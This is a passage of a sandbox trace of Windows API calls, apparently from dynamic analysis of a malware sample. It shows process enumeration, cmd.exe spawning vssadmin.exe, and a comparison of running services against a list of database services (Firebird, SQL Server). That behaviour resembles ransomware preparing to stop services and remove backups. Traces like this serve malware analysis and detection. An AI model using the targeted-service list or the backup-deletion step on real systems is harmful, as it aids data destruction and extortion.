[0221.635] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0221.636] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.636] lstrlenW (lpString="svchost.exe") returned 11 [0221.636] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.637] lstrlenW (lpString="dwm.exe") returned 7 [0221.637] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.638] lstrlenW (lpString="svchost.exe") returned 11 [0221.638] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.638] lstrlenW (lpString="svchost.exe") returned 11 [0221.639] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.639] lstrlenW (lpString="svchost.exe") returned 11 [0221.639] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.640] lstrlenW (lpString="svchost.exe") returned 11 [0221.640] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.641] lstrlenW (lpString="svchost.exe") returned 11 [0221.641] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.641] lstrlenW (lpString="svchost.exe") returned 11 [0221.641] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.642] lstrlenW (lpString="svchost.exe") returned 11 [0221.642] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.643] lstrlenW (lpString="svchost.exe") returned 11 [0221.643] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.644] lstrlenW (lpString="svchost.exe") returned 11 [0221.644] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.645] lstrlenW (lpString="spoolsv.exe") returned 11 [0221.645] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.645] lstrlenW (lpString="svchost.exe") returned 11 [0221.645] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.646] lstrlenW (lpString="svchost.exe") returned 11 [0221.646] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.647] lstrlenW (lpString="audiodg.exe") returned 11 [0221.647] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.647] lstrlenW (lpString="sihost.exe") returned 10 [0221.648] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.648] lstrlenW (lpString="svchost.exe") returned 11 [0221.648] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.649] lstrlenW (lpString="taskhostw.exe") returned 13 [0221.649] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.650] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0221.650] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0221.650] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0221.650] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.651] lstrlenW (lpString="explorer.exe") returned 12 [0221.651] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0221.652] lstrlenW (lpString="Memory Compression") returned 18 [0221.652] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.653] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0221.653] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.653] lstrlenW (lpString="SearchUI.exe") returned 12 [0221.654] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.654] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0221.654] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.655] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0221.655] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0221.656] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0221.656] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0221.657] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0221.657] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.657] lstrlenW (lpString="conhost.exe") returned 11 [0221.657] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0221.658] lstrlenW (lpString="roof competitive.exe") returned 20 [0221.658] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0221.659] lstrlenW (lpString="trustees.exe") returned 12 [0221.659] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0221.660] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0221.660] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0221.661] lstrlenW (lpString="isbn.exe") returned 8 [0221.661] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0221.661] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0221.662] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0221.662] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0221.662] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0221.663] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0221.663] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0221.664] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0221.664] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0221.664] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0221.665] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0221.665] lstrlenW (lpString="playstation iraq.exe") returned 20 [0221.665] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0221.666] lstrlenW (lpString="harbor.exe") returned 10 [0221.666] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0221.667] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0221.667] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0221.667] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0221.668] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0221.668] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0221.668] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0221.669] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0221.669] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0221.670] lstrlenW (lpString="larent.exe") returned 10 [0221.670] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0221.671] lstrlenW (lpString="stereo.exe") returned 10 [0221.671] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0221.671] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0221.671] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0221.672] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0221.672] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0221.673] lstrlenW (lpString="state.exe") returned 9 [0221.673] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0221.674] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0221.674] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.675] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0221.675] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.676] lstrlenW (lpString="taskhostw.exe") returned 13 [0221.676] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.677] lstrlenW (lpString="sppsvc.exe") returned 10 [0221.677] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.677] lstrlenW (lpString="svchost.exe") returned 11 [0221.677] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0221.678] lstrlenW (lpString="Pg.exe") returned 6 [0221.678] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0221.679] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0221.679] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.680] lstrlenW (lpString="conhost.exe") returned 11 [0221.680] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0221.681] lstrlenW (lpString="cmd.exe") returned 7 [0221.681] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.681] lstrlenW (lpString="conhost.exe") returned 11 [0221.681] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0221.682] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0221.682] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.683] lstrlenW (lpString="conhost.exe") returned 11 [0221.683] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0221.684] lstrlenW (lpString="vssadmin.exe") returned 12 [0221.684] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0221.685] CloseHandle (hObject=0x430) returned 1 [0221.685] Sleep (dwMilliseconds=0x1f4) [0222.189] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bc60 [0222.190] EnumServicesStatusExW (in: hSCManager=0x236bc60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0222.190] GetLastError () returned 0xea [0222.190] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0222.190] EnumServicesStatusExW (in: hSCManager=0x236bc60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0222.191] CloseServiceHandle (hSCObject=0x236bc60) returned 1 [0222.191] lstrlenW (lpString="Appinfo") returned 7 [0222.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0222.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0222.191] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0222.191] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0222.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0222.191] lstrlenW (lpString="AppXSvc") returned 7 [0222.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0222.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0222.191] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0222.191] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0222.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0222.191] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0222.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0222.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0222.191] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0222.191] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0222.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0222.191] lstrlenW (lpString="Audiosrv") returned 8 [0222.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0222.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0222.191] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0222.191] lstrcmpiW 